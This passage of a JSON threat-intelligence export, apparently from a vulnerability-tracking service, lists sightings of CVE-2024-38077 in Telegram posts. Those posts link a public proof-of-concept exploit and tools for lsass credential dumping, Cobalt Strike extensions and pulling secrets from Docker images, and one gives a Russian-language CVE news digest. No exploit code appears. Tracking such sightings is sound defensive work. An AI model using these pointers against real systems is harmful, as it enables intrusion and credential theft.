dumps.\n\nhttps://github.com/ricardojoserf/TrickDump\n\nAn engine to make Tor network your default gateway.\n\ngithub.com/htrgouvea/nipe\n\nDeveloping a cryptographically secure bootloader for RISC-V in Rust.\n\nhttps://github.com/LawrenceHunter/SentinelBoot\n\nViT-CoMer: Vision Transformer with Convolutional Multi-scale Feature Interaction for Dense Predictions\n\nhttps://github.com/Traffic-X/ViT-CoMer\n\nScattered Mixture-of-Experts Implementation\n\nhttps://github.com/shawntan/scattermoe\n\nH-SAM\n\nhttps://github.com/cccccczh404/h-sam\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-11T06:50:59.000000Z"}, {"uuid": "e199ff2f-0ace-40f5-80cd-149ce4782698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "Telegram/u2SiIBCEVSAdR1-WZrJ6gJSJGjnSS4esVqfOLou1ZIufOPU", "content": "", "creation_timestamp": "2024-08-14T14:50:35.000000Z"}, {"uuid": "08893522-5e97-4bb8-838c-7e766cb33daf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "Telegram/NtMJmsu5OdwRwL5RtgSB3XfnAMZv-UOSWXMJxwrl638Wqiw", "content": "", "creation_timestamp": "2024-08-21T00:31:40.000000Z"}, {"uuid": "7eefdd51-3c80-4d56-a872-745c093ffb1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "Telegram/XBbA837A0JlpI7oyhejrfthw4ZDwzRNTZ9d5zGrZ58Vm5xiG", "content": "", "creation_timestamp": "2024-09-03T16:25:14.000000Z"}, {"uuid": "ddf0842b-ada3-454a-aaa5-07f877a19efc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "Telegram/Of2Kb3BH1cSzagG5aitaTXMuol_FlzE3JJycXoOKuqkB4CrA", "content": "", "creation_timestamp": "2024-10-16T22:54:54.000000Z"}, {"uuid": "f29f58c4-313f-41d6-a530-9e45387de528", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "Telegram/g828ofeUXJ_EaqLqQDUKe1Hb7L8vrV2fOCsaxFJqpzs51c_L", "content": "", "creation_timestamp": "2024-10-16T17:29:15.000000Z"}, {"uuid": "e5fd4f6f-1e70-4bc8-8bf5-cb8ca1670ddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "Telegram/bjmbWXh1u4qHMUEiaUoV-7ptWYJhrnaxeG5dLtCzi7p327pJ", "content": "", "creation_timestamp": "2024-10-16T17:29:29.000000Z"}, {"uuid": "4a879ec2-556a-4972-ac4a-0d3d8f505116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "Telegram/h0jO4dX4dVPvI52neldcJV8pQ6DILU4S6YliudeH1KxdjWIi", "content": "", "creation_timestamp": "2024-10-16T13:57:05.000000Z"}, {"uuid": "98c75a73-39a2-4d17-a47c-b6053bc66b15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7246", "content": "Tools  - Hackers Factory \n\n''GitHub - rasta-mouse/OST-C2-Spec: Open Source C&amp;C Specification''\n\nhttps://github.com/rasta-mouse/OST-C2-Spec\n\nCVE-2024-38077: Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\nEfficiently scan for exposed Swagger endpoints across web domains and subdomains (Supports HTTP/HTTPS, multi-threading, and flexible input/output options. Ideal for API security testing) \n\nhttps://github.com/brinhosa/apidetector\n\nTrickDump dumps the #lsass process without creating a #Minidump file, generating instead 3 JSON and 1 ZIP file with the memory region dumps.\n\nhttps://github.com/ricardojoserf/TrickDump\n\nAn engine to make Tor network your default gateway.\n\ngithub.com/htrgouvea/nipe\n\nDeveloping a cryptographically secure bootloader for RISC-V in Rust.\n\nhttps://github.com/LawrenceHunter/SentinelBoot\n\nViT-CoMer: Vision Transformer with Convolutional Multi-scale Feature Interaction for Dense Predictions\n\nhttps://github.com/Traffic-X/ViT-CoMer\n\nScattered Mixture-of-Experts Implementation\n\nhttps://github.com/shawntan/scattermoe\n\nH-SAM\n\nhttps://github.com/cccccczh404/h-sam\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-11T05:57:17.000000Z"}, {"uuid": "ed7213e6-fcd1-4c7e-8614-3cc5af80d56d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7256", "content": "Tools - Hackers Factory \n\nApplication to comfortably monitor your Internet traffic\n\nhttps://github.com/GyulyVGC/sniffnet\n\nOSINT CHEAT SHEET Tools &amp; Methods\n\nhttps://github.com/NotLoBi/NotLoBi\n\nHookchain\n\nhttps://github.com/helviojunior/hookchain\n\nUnwaf is a Go tool designed to help identify WAF bypasses using passive techniques, such as: SPF records and DNS history. By default, Unwaf will check SPF records.\n\nhttps://github.com/mmarting/unwaf\n\nOpenHaystack is a framework for tracking personal Bluetooth devices via Apple's massive Find My network. Use it to create your own tracking tags that you can append to physical objects (keyrings, backpacks, ...) or integrate it into other Bluetooth-capable devices such as notebooks.\n\nhttps://github.com/seemoo-lab/openhaystack\n\nCobalt Strike beacon object files (BOFs) is a feature that was added to the beacon in order to allow rapid beacon extendibility in a more OPSEC way.\n\nhttps://github.com/securifybv/Visual-Studio-BOF-template\n\nCVE-2024-38077-EXP\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC/tree/main\n\nDockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.\n\nhttps://github.com/UndeadSec/DockerSpy\n\nUltimate Hardware Hacking Gear Guide\n\nhttps://github.com/jcldf/ultimate-hardware-hacking-gear-guide-\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-12T02:32:08.000000Z"}, {"uuid": "cda4ef10-7831-4956-8137-eba029a64ffb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/zer0day1ab/168", "content": "CVE-2024-38077: Windows Remote Desktop Licensing Service RCE\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\n\u0417\u0430\u043f\u0430\u0442\u0447\u0435\u043d\u043e 9 \u0438\u044e\u043b\u044f\n\n#exploit #ad #rce #pentest #redteam", "creation_timestamp": "2024-08-10T14:40:09.000000Z"}, {"uuid": "0cf5d01c-79ff-4030-9c3f-38d7bb175492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "seen", "source": "https://t.me/true_secator/6212", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043e\u0442\u0440\u0430\u0441\u043b\u0435\u0432\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b.\n\n1. Ivanti, \u043a\u0430\u043a \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c, \u0441\u0442\u043e\u043b\u043a\u043d\u0443\u043b\u0430\u0441\u044c \u0441 \u044d\u043a\u0430\u043f\u043b\u0430\u0442\u0430\u0446\u0438\u0435\u0439 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Cloud Service Appliance (CSA). CVE-2024-8190 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435. \n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 Ivanti CSA \u0441 \u0438\u0441\u0442\u0435\u043a\u0448\u0438\u043c \u0441\u0440\u043e\u043a\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0441\u0438\u0442 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043d\u0430 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u041f\u041e, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a.\n\n2. Horizon3 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f CVE-2024-29847, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RCE \u0432 Ivanti Endpoint Manager, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435.\n\n\u0422\u0430\u043a \u0447\u0442\u043e \u0438 \u0442\u0443\u0442 \u0441\u0442\u043e\u0438\u0442 \u043e\u0436\u0438\u0434\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n3. Apple \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f Vision Pro \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u0423\u043d\u0438\u0432\u0435\u0440\u0441\u0438\u0442\u0435\u0442\u0430 \u0424\u043b\u043e\u0440\u0438\u0434\u044b \u0438 \u0422\u0435\u0445\u0430\u0441\u0441\u043a\u043e\u0433\u043e \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0438\u0442\u0435\u0442\u0430 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0438, \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0435 \u043f\u0430\u0440\u043e\u043b\u0438, \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u0437\u0433\u043b\u044f\u043d\u0443\u0432 \u043d\u0430 \u043a\u043b\u0430\u0432\u0438\u0448\u0438.\n\n\u041c\u0435\u0442\u043e\u0434 \u0430\u0442\u0430\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 GAZEploit \u0438 \u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043f\u0435\u0447\u0430\u0442\u0430\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c Vision Pro, \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u0434\u0432\u0438\u0436\u0435\u043d\u0438\u044f \u0433\u043b\u0430\u0437.\n\n\u0410\u0442\u0430\u043a\u0430 \u0431\u044b\u043b\u0430 \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 30 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 \u0438 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0442\u043e\u0447\u043d\u043e\u0441\u0442\u044c.\n\nApple \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u0430\u043a\u00a0CVE-2024-40865\u00a0 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u0435\u0435 \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c visionOS 1.3. \n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f visionOS 1.3 \u0431\u044b\u043b\u0430 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0432 \u043a\u043e\u043d\u0446\u0435 \u0438\u044e\u043b\u044f, \u043d\u043e 5 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f Apple \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 \u0435\u0435, \u0432\u043a\u043b\u044e\u0447\u0438\u0432 CVE-2024-40865.\u00a0\n\n4. \u0415\u0449\u0435 \u043f\u043e Apple: \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432 iOS 18 \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442\u00a0\u0444\u0443\u043d\u043a\u0446\u0438\u044e\u00a0\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b iPhone, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u043a\u0430\u043c\u0435\u0440\u044b, \u0430\u043a\u043a\u0443\u043c\u0443\u043b\u044f\u0442\u043e\u0440\u044b \u0438 \u0434\u0438\u0441\u043f\u043b\u0435\u0438. \n\n\u041f\u043e\u043c\u0438\u043c\u043e \u043f\u043b\u044e\u0441\u043e\u0432 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0430 \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 \u0441\u0443\u043b\u0438\u0442 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u043c\u043e\u043d\u0442\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0434\u043b\u044f \u0447\u0430\u0441\u0442\u043d\u044b\u0445 \u043c\u0430\u0441\u0442\u0435\u0440\u0441\u043a\u0438\u0445.\n\n5. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0413\u0430\u0431\u043e\u0440 \u041b\u0435\u0433\u0440\u0430\u0434\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0435 Spring Java. \n\nCVE-2024-38816 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043b\u044e\u0431\u043e\u043c\u0443 \u0444\u0430\u0439\u043b\u0443 \u0432\u043d\u0443\u0442\u0440\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a\u0430.\n\n\u0410\u0442\u0430\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432. \u041d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 VMware \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b.\n\n6. \u041c\u0438\u043a\u043a\u043e \u041a\u0435\u043d\u0442\u0442\u044f\u043b\u044f \u0432\u044b\u043a\u0430\u0442\u0438\u043b \u043e\u0442\u0447\u0435\u0442 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0441\u0435\u0440\u0438\u0438 \u043e\u0448\u0438\u0431\u043e\u043a, \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0445 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430 \u043d\u0430\u0437\u0430\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u043b\u0438 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f Zero Click \u0430\u0442\u0430\u043a \u043d\u0430 \u0441\u0440\u0435\u0434\u044b \u043a\u0430\u043b\u0435\u043d\u0434\u0430\u0440\u044f macOS. \u0412\u0441\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u0432 \u043f\u0435\u0440\u0438\u043e\u0434 \u0441 2022 \u043f\u043e \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044c 2023 \u0433\u043e\u0434\u0430.\n\n7. \u0412 Positive Technologies \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043f\u0440\u043e \u0441\u0430\u043c\u044b\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u0412 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u044b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435:\n\n- RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Windows Remote Desktop Licensing Service, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 MadLicense (CVE-2024-38077);\n\n- \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 Mark of the Web \u0432 Windows, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0430\u044f \u043a \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 (CVE-2024-38213);\n\n- EoP-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u044f\u0434\u0440\u0435 Windows (CVE-2024-38106), \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0435 Ancillary Function (CVE-2024-38193) \u0438 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Power Dependency Coordinator (CVE-2024-38107);\n\n- EoP-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 LiteSpeed Cache \u0434\u043b\u044f WordPress CMS (CVE-2024-28000).", "creation_timestamp": "2024-09-16T19:00:07.000000Z"}, {"uuid": "04ef9c7d-0166-4a7d-95ed-ee1708c778af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1517", "content": "CVE-2024-38077: Windows Remote Desktop Licensing Service RCE\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\n\u0417\u0430\u043f\u0430\u0442\u0447\u0435\u043d\u043e 9 \u0438\u044e\u043b\u044f\n\n#exploit #ad #rce #pentest #redteam", "creation_timestamp": "2024-08-09T08:15:48.000000Z"}, {"uuid": "d824288e-b111-4cd1-bd3c-0e1bc281ca9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3695", "content": "CVE-2024-38077: Windows Remote Desktop Licensing Service RCE\n\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC", "creation_timestamp": "2024-09-02T00:52:59.000000Z"}, {"uuid": "d5154ef7-29bd-4d51-a3a4-fafb4e3deb3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2975", "content": "https://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\nCVE-2024-38077-EXP\n#github #poc", "creation_timestamp": "2024-08-10T08:58:51.000000Z"}, {"uuid": "b296d5f2-852e-44ec-820e-220fd737c1c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10959", "content": "#exploit\n1. CVE-2024-38077:\nWindows RDL Service RCE\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\n2. CVE-2024-38054:\nWindows Server &lt; 2022 23H2 - Kernel Streaming WOW Thunk Service Driver Memory Corruption\nhttps://github.com/Black-Frost/windows-learning/tree/main/CVE-2024-38054", "creation_timestamp": "2024-08-10T12:07:01.000000Z"}, {"uuid": "e2af5c26-688f-4010-be7d-bdf08883bbd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-38077", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3748", "content": "#exploit\n1. CVE-2024-38077:\nWindows RDL Service RCE\nhttps://github.com/CloudCrowSec001/CVE-2024-38077-POC\n\n2. CVE-2024-38054:\nWindows Server &lt; 2022 23H2 - Kernel Streaming WOW Thunk Service Driver Memory Corruption\nhttps://github.com/Black-Frost/windows-learning/tree/main/CVE-2024-38054", "creation_timestamp": "2024-08-16T11:23:45.000000Z"}]}